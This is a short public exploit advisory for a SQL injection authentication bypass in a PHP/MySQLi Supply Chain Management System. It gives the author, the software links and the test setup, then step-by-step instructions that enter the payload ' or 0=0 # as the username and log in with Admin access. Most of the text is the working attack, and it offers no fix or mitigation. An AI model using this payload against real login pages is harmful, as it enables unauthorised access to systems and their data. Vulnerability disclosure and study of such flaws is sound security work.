Supply Chain Management System SQL Injection

Supply Chain Management System suffers from a remote SQL injection vulnerability that allows for authentication bypass.


MD5 | d7d6b405c12bcf353faaedb48b2bb9bf

# Exploit Title: Supply Chain Management System - Auth Bypass SQL Injection
# Date: 2020-12-11
# Exploit Author: Piyush Malviya
# Vendor Homepage: https://www.sourcecodester.com/php/14619/supply-chain-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14619&title=Supply+Chain+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Tested On: Windows 10 Pro Build 18363.1256 + XAMPP V3.2.4

#Vulnerable Page: Login Page

#Exploit
Open the Application
check the URL: http://localhost/scm-master/


Open Login Page
Enter username: ' or 0=0 #
Enter password: '
Select Login Type: Admin

click on login
The SQL payload gets executed and authentication is bypassed successfully


Related Posts